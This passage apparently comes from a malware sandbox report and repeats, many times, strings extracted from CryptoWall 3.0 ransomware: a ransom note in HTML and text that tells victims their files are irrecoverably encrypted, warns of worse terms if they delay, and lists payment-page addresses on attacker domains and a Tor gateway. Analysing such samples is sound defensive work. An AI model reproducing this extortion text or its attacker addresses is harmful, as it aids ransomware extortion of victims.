target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt127.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html122.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt224.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html195.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt169.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html262.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html20.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html269.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt281.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt136.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt378.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt321.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html310.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html374.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html330.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt408.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html307.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html34.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html309.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html0.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a 